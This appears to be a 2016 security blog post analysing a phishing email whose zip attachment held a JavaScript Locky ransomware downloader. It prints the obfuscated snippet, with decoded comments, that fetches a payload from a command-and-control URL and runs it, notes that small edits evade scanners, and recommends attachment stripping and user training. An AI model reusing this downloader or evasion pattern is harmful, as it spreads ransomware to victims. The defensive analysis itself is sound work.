27 February 2016

Outlook is definitely my favorite email app. If properly configured, spear phishing attacks can be easily detected – and so is it here.

Email with Locky Attachment, click to enlarge.

Since the size of the attachment was too small to contain an image, I opened the zip file and found a java script version of Locky.A inside. As always most of the popular anti-malware scanners identified the malicious code after one day.

It’s always good to know the enemy. Therefore, I’ve put the code snippet, which downloads the payload from the Command & Control server, here:

try {
var    jsaykajS = '\u0052un';
/*  Translates into:  var    jsayjajS = 'Run'; */

wRXGXAa['\u006Fpe\u006E']('\u0047ET' , '\u0068\u0074\u0074\u0070:\u002F\u002F\u007A\u0061\u007Aa\u002D\u006B\u0079\u006A\u006F\u0076\u002E\u0063\u007A\u002F\u0073\u0079\u0073\u0074\u0065\u006D\u002F\u0063\u0061\u0063\u0068\u0065\u002F\u0038\u0037\u0068\u0037\u0035\u0034', false);
/* Translates into:  wRXGXAa['Open']('GET' ,'http://zaza-kyjov.cz/system/cache/87h754',false); */

wRXGXAa['\u0073\u0065nd']();
/* Translates into: wRXGXAa['Send'] ();  */
lRJrL [jsaykajS](LWHEQOz, 1, false);
} catch (ajg9ggxFs) {};

It’s important to note that even small changes to the code cut the detection rate dramatically. Cyber criminals can create new versions easily because java script can be simply modified with notepad. With this classic anti-malware system have limited effect only.

How to deal with this challenge? First line of defense is as always user awareness training.

In addition, in-depth scanning of all incoming and outgoing emails is required. To be honest, I would recommend to strip off suspicious attachments (whatever scripts, executables, compressed files, old style office documents, xlsm, docm, pdf with embedded files etc. ) and notify the users of the protection measures taken.

Users will not be thrilled, but that’s much better than paying lots of money to cyber criminals or go out of business for a long time.

Have a good weekend, and take care.